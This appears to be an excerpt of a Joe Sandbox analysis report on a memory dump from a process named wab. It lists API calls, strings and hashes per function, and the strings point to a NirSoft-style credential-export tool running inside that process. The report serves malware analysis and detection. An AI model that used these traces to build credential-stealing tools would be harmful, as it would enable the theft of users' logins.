                                      • API ID: ??2@??3@_snwprintfwcscpy
                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                      • API String ID: 2899246560-1542517562
                                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                      APIs
                                      • memset.MSVCRT ref: 0040DBCD
                                      • memset.MSVCRT ref: 0040DBE9
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                      • wcscpy.MSVCRT ref: 0040DC2D
                                      • wcscpy.MSVCRT ref: 0040DC3C
                                      • wcscpy.MSVCRT ref: 0040DC4C
                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                      • wcscpy.MSVCRT ref: 0040DCC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                      • API String ID: 3330709923-517860148
                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                      APIs
                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                      • memset.MSVCRT ref: 0040806A
                                      • memset.MSVCRT ref: 0040807F
                                      • _wtoi.MSVCRT ref: 004081AF
                                      • _wcsicmp.MSVCRT ref: 004081C3
                                      • memset.MSVCRT ref: 004081E4
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                      • String ID: logins$null
                                      • API String ID: 3492182834-2163367763
                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • memset.MSVCRT ref: 004085CF
                                      • memset.MSVCRT ref: 004085F1
                                      • memset.MSVCRT ref: 00408606
                                      • strcmp.MSVCRT ref: 00408645
                                      • _mbscpy.MSVCRT ref: 004086DB
                                      • _mbscpy.MSVCRT ref: 004086FA
                                      • memset.MSVCRT ref: 0040870E
                                      • strcmp.MSVCRT ref: 0040876B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                      • String ID: ---
                                      • API String ID: 3437578500-2854292027
                                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                      APIs
                                      • memset.MSVCRT ref: 0041087D
                                      • memset.MSVCRT ref: 00410892
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                      • DeleteObject.GDI32(?), ref: 004109D0
                                      • DeleteObject.GDI32(?), ref: 004109D6
                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1010922700-0
                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                      APIs
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                      • malloc.MSVCRT ref: 004186B7
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                      • malloc.MSVCRT ref: 004186FE
                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$FullNamePath$malloc$Version
                                      • String ID: |A
                                      • API String ID: 4233704886-1717621600
                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                      • API String ID: 2081463915-1959339147
                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2012295524-70141382
                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                      • API String ID: 667068680-3953557276
                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004121FF
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                      • SelectObject.GDI32(?,?), ref: 00412251
                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                      • SetCursor.USER32(00000000), ref: 004122BC
                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                      • memcpy.MSVCRT ref: 0041234D
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                      • String ID:
                                      • API String ID: 1700100422-0
                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                      • String ID:
                                      • API String ID: 552707033-0
                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                      • memcpy.MSVCRT ref: 0040C11B
                                      • strchr.MSVCRT ref: 0040C140
                                      • strchr.MSVCRT ref: 0040C151
                                      • _strlwr.MSVCRT ref: 0040C15F
                                      • memset.MSVCRT ref: 0040C17A
                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                      • String ID: 4$h
                                      • API String ID: 4066021378-1856150674
                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: %%0.%df
                                      • API String ID: 3473751417-763548558
                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                      APIs
                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                      • GetTickCount.KERNEL32 ref: 0040610B
                                      • GetParent.USER32(?), ref: 00406136
                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                      • String ID: A
                                      • API String ID: 2892645895-3554254475
                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                      APIs
                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                      • memset.MSVCRT ref: 0040DA23
                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                      • String ID: caption
                                      • API String ID: 973020956-4135340389
                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                      APIs
                                      Strings
                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf$wcscpy
                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                      • API String ID: 1283228442-2366825230
                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                      APIs
                                      • wcschr.MSVCRT ref: 00413972
                                      • wcscpy.MSVCRT ref: 00413982
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      • wcscpy.MSVCRT ref: 004139D1
                                      • wcscat.MSVCRT ref: 004139DC
                                      • memset.MSVCRT ref: 004139B8
                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                      • memset.MSVCRT ref: 00413A00
                                      • memcpy.MSVCRT ref: 00413A1B
                                      • wcscat.MSVCRT ref: 00413A27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                      • String ID: \systemroot
                                      • API String ID: 4173585201-1821301763
                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
